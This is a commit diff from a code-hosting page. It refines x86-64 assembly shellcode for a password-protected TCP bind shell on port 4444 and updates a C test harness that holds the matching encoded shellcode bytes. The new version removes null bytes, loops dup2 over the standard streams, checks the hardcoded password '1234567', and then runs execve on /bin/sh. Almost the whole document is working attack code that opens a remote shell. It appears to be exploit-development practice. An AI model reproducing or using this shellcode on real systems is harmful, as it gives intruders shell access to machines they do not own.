Commit 561da605 authored by André Lima's avatar André Lima

improvements

parent 8f516783
global _start
_start:
; sock = socket(AF_INET, SOCK_STREAM, 0)
......@@ -8,140 +7,107 @@ _start:
; SOCK_STREAM = 1
; syscall number 41
xor rax,rax
mov al,41
mov rax, 41
mov rdi, 2
mov rsi, 1
mov rdx, 0
push 41
pop rax
push 2
pop rdi
push 1
pop rsi
cdq
syscall
; copy socket descriptor to rdi for future use
mov rdi, rax
xchg rdi,rax
; server.sin_family = AF_INET
; server.sin_port = htons(PORT)
; server.sin_addr.s_addr = INADDR_ANY
; bzero(&server.sin_zero, 8)
xor rax, rax
push rax
mov dword [rsp-4], eax
mov word [rsp-6], 0x5c11
mov word [rsp-8], 0x2
sub rsp, 8
push rdx
mov dx,0x5c11
shl rdx,16
xor dl,0x2
push rdx
; bind(sock, (struct sockaddr *)&server, sockaddr_len)
; syscall number 49
mov rax, 49
mov rsi, rsp
mov rdx, 16
mov al,49
push 16
pop rdx
syscall
; listen(sock, MAX_CLIENTS)
; syscall number 50
mov rax, 50
mov rsi, 2
push 50
pop rax
push 2
pop rsi
syscall
; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)
; syscall number 43
mov rax, 43
sub rsp, 16
mov rsi, rsp
mov byte [rsp-1], 16
sub rsp, 1
mov rdx, rsp
syscall
; store the client socket description
mov r9, rax
; close parent
mov rax, 3
syscall
; duplicate sockets
; dup2 (new, old)
mov rdi, r9
mov rax, 33
mov rsi, 0
syscall
mov rax, 33
mov rsi, 1
syscall
mov rax, 33
mov rsi, 2
syscall
; execve
; First NULL push
xor rax, rax
push rax
; push /bin//sh in reverse
mov rbx, 0x68732f2f6e69622f
push rbx
; store /bin//sh address in RDI
mov rdi, rsp
; Second NULL push
push rax
; set RDX
mov rdx, rsp
; Push address of /bin//sh
push rdi
; set RSI
mov rsi, rsp
; Call the Execve syscall
add rax, 59
syscall
mov al,43
sub rsp,16
mov rsi,rsp
push 16
mov rdx,rsp
syscall
; close parent
;push 3
;pop rax
;syscall
; duplicate sockets
; dup2 (new, old)
xchg rdi,rax
push 3
pop rsi
dup2cycle:
mov al, 33
dec esi
syscall
loopnz dup2cycle
; read passcode
; xor rax,rax - already zeroed from prev cycle
xor rdi,rdi
push rax
mov rsi,rsp
push 8
pop rdx
syscall
; Authentication with password "1234567"
xchg rcx,rax
mov rbx,0x0a37363534333231
push rbx
mov rdi,rsp
repe cmpsb
jnz wrong_pwd
; execve stack-method
push 59
pop rax
cdq ; extends rax sign into rdx, zeroing it out
push rdx
mov rbx,0x68732f6e69622f2f
push rbx
mov rdi,rsp
push rdx
mov rdx,rsp
push rdi
mov rsi,rsp
syscall
wrong_pwd:
nop
......@@ -2,8 +2,7 @@
#include<string.h>
unsigned char code[] = \
"\x48\xb8\x29\x00\x00\x00\x00\x00\x00\x00\x48\xbf\x02\x00\x00\x00\x00\x00\x00\x00\x48\xbe\x01\x00\x00\x00\x00\x00\x00\x00\x48\xba\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\x89\x44\x24\xfc\x66\xc7\x44\x24\xfa\x11\x5c\x66\xc7\x44\x24\xf8\x02\x00\x48\x83\xec\x08\x48\xb8\x31\x00\x00\x00\x00\x00\x00\x00\x48\x89\xe6\x48\xba\x10\x00\x00\x00\x00\x00\x00\x00\x0f\x05\x48\xb8\x32\x00\x00\x00\x00\x00\x00\x00\x48\xbe\x02\x00\x00\x00\x00\x00\x00\x00\x0f\x05\x48\xb8\x2b\x00\x00\x00\x00\x00\x00\x00\x48\x83\xec\x10\x48\x89\xe6\xc6\x44\x24\xff\x10\x48\x83\xec\x01\x48\x89\xe2\x0f\x05\x49\x89\xc1\x48\xb8\x03\x00\x00\x00\x00\x00\x00\x00\x0f\x05\x4c\x89\xcf\x48\xb8\x21\x00\x00\x00\x00\x00\x00\x00\x48\xbe\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x05\x48\xb8\x21\x00\x00\x00\x00\x00\x00\x00\x48\xbe\x01\x00\x00\x00\x00\x00\x00\x00\x0f\x05\x48\xb8\x21\x00\x00\x00\x00\x00\x00\x00\x48\xbe\x02\x00\x00\x00\x00\x00\x00\x00\x0f\x05\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05";
"\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x99\x0f\x05\x48\x97\x52\x66\xba\x11\x5c\x48\xc1\xe2\x10\x80\xf2\x02\x52\x48\x89\xe6\xb0\x31\x6a\x10\x5a\x0f\x05\x6a\x32\x58\x6a\x02\x5e\x0f\x05\xb0\x2b\x48\x83\xec\x10\x48\x89\xe6\x6a\x10\x48\x89\xe2\x0f\x05\x48\x97\x6a\x03\x5e\xb0\x21\xff\xce\x0f\x05\xe0\xf8\x48\x31\xff\x50\x48\x89\xe6\x6a\x08\x5a\x0f\x05\x48\x91\x48\xbb\x31\x32\x33\x34\x35\x36\x37\x0a\x53\x48\x89\xe7\xf3\xa6\x75\x1d\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe7\x52\x48\x89\xe2\x57\x48\x89\xe6\x0f\x05\x90";
main()
{
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment